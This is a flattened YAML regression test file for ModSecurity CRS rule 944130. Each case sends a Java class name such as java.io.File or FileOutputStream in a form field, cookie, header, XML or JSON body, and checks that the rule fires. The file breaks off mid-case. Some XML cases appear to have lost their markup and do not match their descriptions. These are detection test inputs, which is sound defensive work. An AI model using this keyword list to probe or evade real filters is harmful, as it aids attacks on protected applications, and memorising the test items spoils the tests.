Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-63 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-64 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-65 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-66 + desc: "Argument test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-67 + desc: "Argument name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-68 + desc: "Cookie test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-69 + desc: "Cookie name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-70 + desc: "Request header test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-71 + desc: "XML attribute value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-72 + desc: "XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-73 + desc: "Nested XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-74 + desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-75 + desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-76 + desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-77 + desc: "Argument test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-78 + desc: "Argument name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-79 + desc: "Cookie test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-80 + desc: "Cookie name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-81 + desc: "Request header test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-82 + desc: "XML attribute value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-83 + desc: "XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-84 + desc: "Nested XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-85 + desc: "Content-Type text/plain includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-86 + desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-87 + desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-88 + desc: "Argument test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-89 + desc: "Argument name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-90 + desc: "Cookie test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-91 + desc: "Cookie name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-92 + desc: "Request header test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-93 + desc: "XML attribute value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-94 + desc: "XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-95 + desc: "Nested XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-96 + desc: "Content-Type text/plain includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-97 + desc: "Content-Type application/json arg value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-98 + desc: "Content-Type application/json arg name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-99 + desc: "Argument test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-100 + desc: "Argument name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-101 + desc: "Cookie test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-102 + desc: "Cookie name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-103 + desc: "Request header test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-104 + desc: "XML attribute value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-105 + desc: "XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-106 + desc: "Nested XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-107 + desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-108 + desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-109 + desc: "Content-Type application/json arg name includes 